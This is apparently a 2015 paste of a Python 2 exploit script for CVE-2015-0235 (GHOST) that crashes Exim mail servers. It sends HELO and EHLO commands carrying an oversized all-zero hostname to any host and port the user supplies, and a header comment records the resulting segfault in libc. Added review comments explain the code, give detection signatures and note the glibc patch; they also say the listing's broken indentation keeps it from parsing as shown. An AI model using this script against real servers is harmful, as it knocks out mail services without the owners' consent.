kbahaxor

Ghost DOS

Jan 30th, 2015
  1.  
  2. #!/usr/bin/python
  3. # Exim ESMTP DoS Exploit by 1N3 v20150128
  4. # CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
  5. # http://crowdshield.com
  6. #
  7. # USAGE: python ghost-smtp-dos.py <ip> <port>
  8. #
  9. # Escape character is '^]'.
  10. # 220 debian-7-7-64b ESMTP Exim 4.80 ...
  11. # HELO
  12. #
  13. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  14. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  15. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  16. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  17. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  18. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  19. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  20. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  21. 0000000000000000000000000000
  22. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  23. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  24. 000000000000
  25. # Connection closed by foreign host.
  26. #
  27. # user () debian-7-7-64b:~$ dmesg
  28. # ...
  29. # [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
  30. # libc-2.13.so[7fabef2a2000+182000]
  31.  
  32. import socket
  33. import time
  34. import sys, getopt
  35.  
  # main(argv): proof-of-concept client for CVE-2015-0235 (GHOST). It opens one
  # TCP connection to an SMTP service and sends HELO, then EHLO, each carrying a
  # hostname argument made only of the digit 0 and far longer than a normal
  # hostname. argv[1] is read as the host and argv[2] as the port; nothing is
  # returned.
  # NOTE(review): this listing has lost its indentation and the string literal
  # is wrapped across numbered lines (apparently by the paste rendering), so it
  # does not parse as shown. The print statements are Python 2 syntax.
  # Defender view: a HELO/EHLO argument of this size that consists solely of
  # digits is not a plausible hostname, so it is a usable signature for SMTP
  # proxy or IDS rules and for mail-log review. The durable fix is a glibc build
  # that contains the CVE-2015-0235 patch, followed by a restart of every
  # service linked against it.
  # NOTE(review): exposure requires the server to hand the HELO name to
  # gethostbyname(); for Exim that is reportedly only the case when HELO
  # verification (helo_verify_hosts / helo_try_verify_hosts) is enabled.
  # Confirm against the vendor advisory.
  36. def main(argv):
  37. argc = len(argv)
  38.  
  # With no argument at all, print a usage line and exit with status 0.
  39. if argc <= 1:
  40. print "usage: %s <host>" % (argv[0])
  41. sys.exit(0)
  42.  
  # This socket object is replaced by a second socket.socket() call further
  # down and is never used.
  43. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  # The hostname argument: one long string of '0' characters. Its length is not
  # stated here; the script prints len(buffer) at run time.
  44. buffer =
  45. "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  46. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  47. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  48. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  49. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  50. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  51. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  52. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  53. 0000000000000000000000
  54. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  55. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  56. 000000000000000000000000"
  57.  
  58. target = argv[1] # SET TARGET
  59. port = argv[2] # SET PORT
  60.  
  # Banner plus a status line that reports the host, the port and the payload length.
  61. print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
  62. print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:"
  63. +str(len(buffer))
  # New TCP socket. No timeout is set on it, so each recv() below blocks until
  # the server answers or closes the connection.
  64. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  # The value assigned to `connect` is not used afterwards.
  65. connect=s.connect((target,int(port)))
  # Read up to 1024 bytes of the server's greeting and echo it.
  66. data = s.recv(1024)
  67. print "CONNECTION: " +data
  # First command with the oversized argument. The header comment of this paste
  # records the host-side result on the author's test system: a kernel log line
  # reporting an exim4 segfault inside libc. That log line is the host
  # indicator to alert on.
  68. s.send('HELO ' + buffer + '\r\n')
  69. data = s.recv(1024)
  70. print "received: " +data
  # Same argument again with EHLO, sent on the same connection.
  71. s.send('EHLO ' + buffer + '\r\n')
  72. data = s.recv(1024)
  73. print "received: " +data
  74. s.close()
  75.  
  # Entry point: this call is not wrapped in an `if __name__ == "__main__":`
  # guard, so it runs whenever the file is executed or imported.
  76. main(sys.argv)